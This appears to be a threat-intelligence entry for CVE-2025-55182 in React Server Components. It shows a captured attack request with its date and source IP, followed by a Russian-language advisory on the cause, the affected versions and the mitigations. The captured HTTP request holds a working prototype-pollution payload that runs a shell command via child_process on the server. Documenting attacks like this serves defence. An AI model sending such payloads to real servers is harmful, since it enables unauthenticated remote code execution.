CVE-2025-55182

2026-04-01

44.234.89.126

united states 

Meta 

React 

POST / HTTP/1.0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/█████████ Safari/537.36
Host: ███████████
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundarya769af5486094e96
Content-Length: 862
X-Forwarded-For: █████████████
Accept-Encoding: gzip, deflate
Accept: */*
Next-Action: x
X-Nextjs-Request-Id: 0509e039
Connection: close

----------WebKitFormBoundarya769af5486094e96
Content-Disposition: form-data; name="1_$ACTION_ID_vercel"

""
----------WebKitFormBoundarya769af5486094e96
Content-Disposition: form-data; name="0"

{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
----------WebKitFormBoundarya769af5486094e96
Content-Disposition: form-data; name="1"

"$@0"
----------WebKitFormBoundarya769af5486094e96
Content-Disposition: form-data; name="2"

[]
----------WebKitFormBoundarya769af5486094e96--

CVE-2025-55182 затрагивает пакеты react-server-dom-webpack, react-server-dom-parcel и react-server-dom-turbopack версий 19.0.0, 19.1.0, 19.1.1 и 19.2.0. :contentReference
Причина — небезопасная десериализация данных, полученных через протокол “Flight” у React Server Components: сервер принимает HTTP-запрос с payload, неправильно проверяет содержимое и приводит его к JS-структурам, что даёт возможность вставить вредоносные объекты (включая proto и др.). Это может привести к “prototype pollution” и/или выполнению произвольного JS-/OS-кода на сервере. 
Для эксплуатации не требуется аутентификация, сложность атаки низкая — достаточно одного HTTP-запроса.
Учитывая широкое распространение React и фреймворков/сборщиков, использующих RSC (например Next.js, React Router, Waku, Parcel- и Vite-RSC, rwsdk и др.), большое число приложений и сервисов могут быть под угрозой.
Уязвимость была публично раскрыта 3 декабря 2025 года, и вскоре после этого были выпущены патчи.

Обновить пакеты React Server Components: немедленно обновите vuln-пакеты до безопасных версий (react-server-dom-webpack/par­cel/turbopack → 19.0.1, 19.1.2 или 19.2.1).
Проверить зависимости: Проверьте, используются ли во фреймворках или сборщиках RSC (например Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk), и обновите их до патчей. 
Отключить или ограничить RSC-эндпоинты: При возможности временно отключите серверные функции React или закройте к ним доступ через firewall / WAF / сетевые правила.
Защита на уровне runtime: Используйте WAF, систему обнаружения вторжений, мониторинг поведения и другие средства защиты, чтобы блокировать подозрительные запросы и пост-эксплуатационные действия.
Проверка и валидация входящих данных: Пересмотрите логику десериализации, избегайте автоматически десериализовать непроверенные объекты, особенно если приложение принимает JSON/payload от пользователя. Возможно, потребуется дополнительная валидация.